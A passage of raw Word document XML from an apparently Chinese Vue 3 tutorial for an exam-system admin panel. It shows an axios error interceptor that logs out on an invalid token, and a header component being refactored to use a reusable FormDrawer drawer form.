          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2DFD90" w14:textId="77777777" w:rsidR="008D3F92" w:rsidRPr="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D3F92">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">  console.log(msg)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6555BA" w14:textId="77777777" w:rsidR="008D3F92" w:rsidRPr="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D3F92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">  if (msg == "</w:t>
      </w:r>
      <w:r w:rsidRPr="008D3F92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>非法</w:t>
      </w:r>
      <w:r w:rsidRPr="008D3F92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:r w:rsidRPr="008D3F92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，请先登录！</w:t>
      </w:r>
      <w:r w:rsidRPr="008D3F92">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2996A74C" w14:textId="77777777" w:rsidR="008D3F92" w:rsidRPr="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D3F92">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    store.dispatch('logout').finally(() =&gt; location.reload())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139CE9A6" w14:textId="77777777" w:rsidR="008D3F92" w:rsidRPr="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D3F92">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BC5362" w14:textId="77777777" w:rsidR="008D3F92" w:rsidRPr="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24D7946B" w14:textId="77777777" w:rsidR="008D3F92" w:rsidRPr="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D3F92">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">  toast(msg, "error")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D65A116" w14:textId="77777777" w:rsidR="008D3F92" w:rsidRPr="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EE1CF7D" w14:textId="77777777" w:rsidR="008D3F92" w:rsidRPr="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D3F92">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">  return Promise.reject(error);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E1CA0B" w14:textId="77777777" w:rsidR="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008D3F92">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C110DD2" w14:textId="77777777" w:rsidR="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7132AD89" w14:textId="254BF4A7" w:rsidR="008D3F92" w:rsidRDefault="008D3F92" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>export default service;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E58DF4F" w14:textId="77777777" w:rsidR="000B2487" w:rsidRPr="00181907" w:rsidRDefault="000B2487" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="127BCD3E" w14:textId="68968ED9" w:rsidR="000B2487" w:rsidRDefault="000F66D1" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="707" w:name="_Toc159780137"/>
      <w:r w:rsidRPr="000F66D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通用弹框表单组件封装（一）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="707"/>
    </w:p>
    <w:p w14:paraId="327D7A72" w14:textId="77777777" w:rsidR="000B2487" w:rsidRDefault="000B2487" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12CF46BA" w14:textId="36523464" w:rsidR="000B2487" w:rsidRDefault="007174C3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> defineExpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D902D8" w14:textId="2B288B4D" w:rsidR="000B2487" w:rsidRDefault="007174C3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="007174C3">
        <w:lastRenderedPageBreak/>
        <w:t>https://cn.vuejs.org/api/sfc-script-setup.html#defineexpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044EF7EE" w14:textId="77777777" w:rsidR="000B2487" w:rsidRPr="000F66D1" w:rsidRDefault="000B2487" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="648A28AB" w14:textId="3E7DCC06" w:rsidR="000B2487" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将之前</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FHeader</w:t>
      </w:r>
      <w:r>
        <w:t>.vue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的表单部分剪切到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FormDrawer</w:t>
      </w:r>
      <w:r>
        <w:t>.vue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>仅引入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5B139F" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08F099D8" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114AAEE4" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;div class="f-header"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792415E0" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;span class="logo"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7868234A" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;el-icon class="mr-1"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1EC3E5" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;ElemeFilled /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4E0555" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;/el-icon&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052F38E4" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>考试系统</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA64057" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FF4EAE" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;el-icon class="icon-btn"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087A3378" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;Fold /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5315364B" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;/el-icon&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD0C1D2" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36A888AE" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;el-tooltip effect="dark" content="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>刷新</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>" placement="bottom"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A904A8F" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C893781" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;el-icon class="icon-btn" @click="handleRefresh"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0723048B" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;Refresh /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6571F035" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;/el-icon&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F19056E" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DF2478B" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;/el-tooltip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AF7FA1" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;div class="ml-auto flex items-center " style="margin-left: auto;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C01F0E" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12740E37" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;el-tooltip effect="dark" content="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>切换全屏</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>" placement="bottom"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09521B51" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;el-icon class="icon-btn" @click="toggle"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEEA2E8" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    &lt;FullScreen v-if="!isFullscreen" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EC65C4" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    &lt;Aim v-else /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2608CE9F" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;/el-icon&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEB6900" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;/el-tooltip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74280A86" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;el-dropdown class="dropdown" @command="handleCommand"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F28BB9A" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18B1E5C7" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;span class="flex items-center text-light-50"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC8CD2B" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    &lt;el-button class=" bg-transparent text-light-200"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6173EE91" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                        &lt;el-avatar class="mr-2" :size="25" :src="$store.state.user.avatar" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37942BEF" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                        {{ $store.state.user.username }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6641F2" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                        &lt;el-icon class="el-icon--right"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFCBDC0" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                            &lt;arrow-down /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E084A9D" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                        &lt;/el-icon&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F23370A" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    &lt;/el-button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5503317B" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768E1405" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;template #dropdown&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A309F0" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    &lt;el-dropdown-menu&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C11B6B" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                        &lt;el-dropdown-item command="rePassword"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;/el-dropdown-item&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B45D2E7" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">                        &lt;el-dropdown-item command="logout"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>退出登录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;/el-dropdown-item&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B8CB7F" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    &lt;/el-dropdown-menu&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C63B068" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17738DEE" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRPr="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                   </w:t>
      </w:r>
      <w:r w:rsidRPr="008D57F2">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D57F2">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;form-drawer ref="formDrawerRef"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47189896" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRPr="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D57F2">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                        123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A28404" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRPr="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D57F2">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                        &lt;!-- &lt;div style="height:1000px;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AF58E9" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRPr="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FF292BF" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRPr="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D57F2">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                        &lt;/div&gt; --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F49AC0" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRPr="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D57F2">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                    &lt;/form-drawer&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE1B121" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRPr="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56554915" w14:textId="77777777" w:rsidR="008D57F2" w:rsidRDefault="008D57F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008D57F2">
        <w:rPr>
